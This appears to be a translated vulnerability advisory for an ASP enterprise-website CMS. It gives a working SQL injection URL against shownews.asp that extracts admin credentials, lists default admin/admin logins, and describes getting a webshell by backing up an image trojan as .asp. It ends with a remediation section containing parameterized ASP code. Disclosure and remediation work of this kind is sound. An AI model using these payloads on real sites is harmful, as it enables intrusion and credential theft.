Product Introduction:
The system has the common modules and functions of an enterprise website: company profile, contact us, news (articles), products, images, recruitment, online messages, a feedback system, online communication, links, site map, topic management, website fragments, administrators, and permission management. All modules support unlimited classification. It is highly extensible, including a general-purpose column management system and a website fragment management system that can combine different pages and applications. The system provides powerful and flexible back-end management functions and supports pseudo-static URLs, custom banners, custom logos, and so on, and can be used to create an elegant, marketing-oriented company website.
Vulnerable file: shownews.asp
Use the Pangolin cookie injection tool to crack the administrator user name.
Exp: http://www.bkjia.com/shownews.asp?id=338 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
Demo address: http://www.shengmake.net/ceshi/zhuanghuang/
Default admin backend: /admin
User: admin
Pass: admin
Getting a shell from the admin backend is very simple: there is a database backup function, so backing up an image trojan as .asp works, and the last step is to copy the resulting .asp path.
From sentiment blog
Solution:
Strengthen filtering and validation of cookie input to prevent cookie injection.
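
One way to apply this fix in classic ASP, as an added example that is not the vendor's code: the id is read only from the query string, validated as an integer, and bound as a query parameter. It assumes the original page reads the value through the generic Request("id") collection (which also searches cookies); the table and column names (news, title, content) and the Application("ConnString") setting are hypothetical.

```asp
<%
Option Explicit

' Read the id ONLY from the query string. Request("id") falls through to
' Request.Cookies, so a filter that inspects just GET/POST never sees a
' value supplied in a cookie.
Function ReadNewsId()
    Dim raw, re
    raw = Trim(Request.QueryString("id"))
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"        ' digits only, always fits in a Long
    If re.Test(raw) Then
        ReadNewsId = CLng(raw)
    Else
        ReadNewsId = -1                ' missing, repeated, or non-numeric id
    End If
End Function

Dim newsId, conn, cmd, rs
newsId = ReadNewsId()
If newsId < 0 Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnString")    ' hypothetical: connection string location

' Parameterized query: the id is bound as an integer, never concatenated
' into the SQL text, so "and 1=2 union select ..." cannot change the statement.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = 1                    ' adCmdText
cmd.CommandText = "SELECT title, content FROM news WHERE id = ?"
cmd.Parameters.Append cmd.CreateParameter("@id", 3, 1, , newsId) ' adInteger, adParamInput

Set rs = cmd.Execute
If rs.EOF Then
    Response.Status = "404 Not Found"
Else
    Response.Write Server.HTMLEncode(rs("title") & "")
End If
rs.Close
conn.Close
%>
```

The same pattern applies to every other page that takes an id; changing the default admin/admin credentials and restricting the backup function from writing .asp files closes the follow-on steps described above.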